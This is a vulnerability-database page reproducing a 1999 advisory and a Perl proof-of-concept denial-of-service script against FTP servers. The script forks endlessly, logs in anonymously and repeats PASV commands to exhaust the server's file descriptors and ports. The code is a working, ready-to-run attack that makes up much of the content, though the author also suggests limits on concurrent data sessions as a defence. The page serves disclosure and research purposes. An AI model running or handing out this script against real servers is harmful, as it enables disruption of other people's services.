Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ftpd.dos.pl

🗓️ 07 Dec 1999 00:00:00Reported by Darren ReedType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

Analyzes vulnerabilities in FTP servers regarding file descriptors and connection limits.

Code
`Who has more free file descriptors & network ports, you or the ftp server ?  
  
ftpd's which limit connections to 1 per user@host or similar may have some  
defense against this, or if they don't support multiple data connections  
open at the same time. I suspect "many" is the number of ftpd's which are  
vulnderable to this attack so I've made no attempt (except in one case) to  
contact vendors because there are just too many damn vendors, not to mention  
ftpd's! But basically, if the other end has, on average, maximum fd limit  
at 63, allows 50 connections, that's 3000 open fd's. I'm not sure how many  
ftpd's are setup with that many open files as a part of the sytem, but not  
many, I suspect.  
  
No apologies for using perl(5), I just wanted a quick prototype. It's not  
perfect but then I did't want to spend too much time on this.  
  
to ftpd maintainers:  
I don't know of any ftp clients which make use of this feature (multiple  
data channels supported concurrently) as the original ftp clients were all  
line-based and only suported one transfer at a time. Maybe this is  
reasonable, but it would be a shame for the default defense to this attack  
to mean you can't use FTP to it's full potential (i.e. start a transfer  
from the current session but keep using the current `login' session, maybe  
to start other transfers, as requried). Triming the number of concurrent  
data sessions to a maximum of 1-5 (by default) would probably be enough,  
with the capability to set this higher/lower as required.  
  
Darren  
  
  
#!/usr/bin/perl  
  
$DOS_HOST="localhost";  
  
use IO::Socket;  
  
$pid = $$;  
$num = 0;  
  
while (1) {  
while (fork) {  
$sock = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $DOS_HOST,  
PeerPort => "ftp(21)",  
);  
  
if (!$sock) {  
print "connect failed!\n";  
waitpid -1,0;  
}  
  
  
while (<$sock>) {  
print;  
print $sock "USER anonymous\r\n" if (/^220 .*/);  
print $sock "PASS root@\r\n" if (/^331 .*/);  
print $sock "PASV\r\n" if (/^230 .*/);  
  
if (/^227 .*/) {  
$remote = $_;  
$remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/;  
@bits = split(/,/, $remote);  
if ($#bits eq 5) {  
$remport = $bits[4] * 256 + $bits[5];  
$#bits = 3;  
$remip = join('.', @bits);  
$foo[$num++] = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $remip,  
PeerPort => "($remport)");  
}  
print $sock "PASV\r\n";  
}  
last if (/^530 .*/);  
}  
waitpid -1,0;  
}  
sleep(5);  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Dec 1999 00:00Current
7.4High risk
Vulners AI Score7.4
ftp server vulnerabilitiesfile descriptor limitsconnection limitsnetwork portsattack prototype
33